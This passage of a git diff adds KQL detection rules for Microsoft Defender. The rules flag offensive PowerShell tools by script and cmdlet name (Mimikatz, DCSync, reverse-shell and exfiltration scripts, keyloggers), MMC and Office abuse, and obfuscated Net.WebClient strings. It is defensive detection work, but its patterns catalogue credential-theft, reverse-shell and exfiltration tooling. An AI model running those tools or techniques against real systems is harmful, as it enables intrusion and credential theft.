"Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerDPAPI" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "Veeam-Get-Creds" or ProcessCommandLine contains "VolumeShadowCopyTools" \ No newline at end of file diff --git a/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql b/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql new file mode 100644 index 00000000..4cfbdda0 --- /dev/null +++ b/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql @@ -0,0 +1,10 @@ +// Title: Malicious PowerShell Scripts - FileCreation +// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein +// Date: 2018-04-07 +// Level: high +// Description: Detects the creation of known offensive powershell scripts used for exploitation +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceFileEvents +| where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\BadSuccessor.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith "\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith "\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith "\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith "\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith "\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith "\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith "\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith "\\Invoke-Mimikatz.ps1" or FolderPath endswith "\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith "\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith "\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerDPAPI.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith "\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath endswith "\\Invoke-Seatbelt.ps1" or FolderPath endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith "\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith "\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith "\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith "\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\Veeam-Get-Creds.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1") \ No newline at end of file diff --git a/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql b/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql new file mode 100644 index 00000000..2c66a4e1 --- /dev/null +++ b/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql @@ -0,0 +1,12 @@ +// Title: Microsoft Excel Add-In Loaded From Uncommon Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-12 +// Level: medium +// Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations + +DeviceImageLoadEvents +| where (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Perflogs\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Tasks\\") and FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql b/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql new file mode 100644 index 00000000..53a1c169 --- /dev/null +++ b/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql @@ -0,0 +1,12 @@ +// Title: Microsoft VBA For Outlook Addin Loaded Via Outlook +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: medium +// Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Legitimate macro usage. Add the appropriate filter according to your environment + +DeviceImageLoadEvents +| where FolderPath endswith "\\outlvba.dll" and InitiatingProcessFolderPath endswith "\\outlook.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/mmc20_lateral_movement.kql b/KQL/rules/Execution/mmc20_lateral_movement.kql new file mode 100644 index 00000000..9118011c --- /dev/null +++ b/KQL/rules/Execution/mmc20_lateral_movement.kql @@ -0,0 +1,12 @@ +// Title: MMC20 Lateral Movement +// Author: @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea) +// Date: 2020-03-04 +// Level: high +// Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1021.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "-Embedding" and FolderPath endswith "\\mmc.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql b/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql new file mode 100644 index 00000000..d33c3002 --- /dev/null +++ b/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql @@ -0,0 +1,13 @@ +// Title: MMC Executing Files with Reversed Extensions Using RTLO Abuse +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-02-05 +// Level: high +// Description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.014, attack.t1036.002 +// False Positives: +// - Legitimate administrative actions using MMC to execute misnamed `.msc` files. +// - Unconventional but non-malicious usage of RLO or reversed extensions. + +DeviceProcessEvents +| where (ProcessCommandLine contains "cod.msc" or ProcessCommandLine contains "fdp.msc" or ProcessCommandLine contains "ftr.msc" or ProcessCommandLine contains "lmth.msc" or ProcessCommandLine contains "slx.msc" or ProcessCommandLine contains "tdo.msc" or ProcessCommandLine contains "xcod.msc" or ProcessCommandLine contains "xslx.msc" or ProcessCommandLine contains "xtpp.msc") and (FolderPath endswith "\\mmc.exe" or ProcessVersionInfoOriginalFileName =~ "MMC.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql b/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql new file mode 100644 index 00000000..368b43f0 --- /dev/null +++ b/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql @@ -0,0 +1,14 @@ +// Title: MMC Loading Script Engines DLLs +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-02-05 +// Level: medium +// Description: Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt +to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059.005, attack.t1218.014 +// False Positives: +// - Legitimate MMC operations or extensions loading these libraries + +DeviceImageLoadEvents +| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\jscript9.dll") and InitiatingProcessFolderPath endswith "\\mmc.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql b/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql new file mode 100644 index 00000000..f617b3f4 --- /dev/null +++ b/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql @@ -0,0 +1,10 @@ +// Title: Named Pipe Created Via Mkfifo +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: low +// Description: Detects the creation of a new named pipe using the "mkfifo" utility +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where FolderPath endswith "/mkfifo" \ No newline at end of file diff --git a/KQL/rules/Execution/net_webclient_casing_anomalies.kql b/KQL/rules/Execution/net_webclient_casing_anomalies.kql new file mode 100644 index 00000000..0917a37e --- /dev/null +++ b/KQL/rules/Execution/net_webclient_casing_anomalies.kql @@ -0,0 +1,10 @@ +// Title: Net WebClient Casing Anomalies +// Author: Florian Roth (Nextron Systems) +// Date: 2022-05-24 +// Level: high +// Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "TgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAEIA" or ProcessCommandLine contains "OAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAGIA" or ProcessCommandLine contains 